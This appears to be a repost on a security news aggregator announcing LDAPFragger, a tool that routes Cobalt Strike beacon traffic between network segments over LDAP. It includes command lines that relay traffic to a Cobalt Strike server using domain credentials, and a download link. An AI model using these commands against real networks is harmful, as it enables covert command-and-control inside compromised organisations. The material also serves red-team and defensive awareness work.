LDAPFragger - Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP

LDAPFragger is a Command and Control tool that enables attackers to route

From network segment A, run

LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>    LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

From network segment B, run

LDAPFragger     LDAPFragger -u <username> -p <password> -d <domain FQDN>

LDAPS can be used with the --LDAPS flag, however, regular LDAP traffic is encrypted as well. Please do note that the default Cobalt Strike payload will get caught by most AVs.

Download LDAPFragger

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Original Source

Tags: hacking, OSINT, Security, threatintel, tools

LDAPFragger – Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP

Original Source

RansomHouse Ransomware Victim: Gantan Beauty Industry

RansomHouse Ransomware Victim: ABS-CBN Broadcasting

CISA: CISA Adds One Known Exploited Vulnerability to Catalog

CISA: CISA Releases Four Industrial Control Systems Advisories

CISA: CISA and Partners Release Guidance for Civil Society Organizations on Mitigating Cyber Threats with Limited Resources

Original Source

You may have missed

RansomHouse Ransomware Victim: Gantan Beauty Industry

RansomHouse Ransomware Victim: ABS-CBN Broadcasting

CISA: CISA Adds One Known Exploited Vulnerability to Catalog

CISA: CISA Releases Four Industrial Control Systems Advisories

CISA: CISA and Partners Release Guidance for Civil Society Organizations on Mitigating Cyber Threats with Limited Resources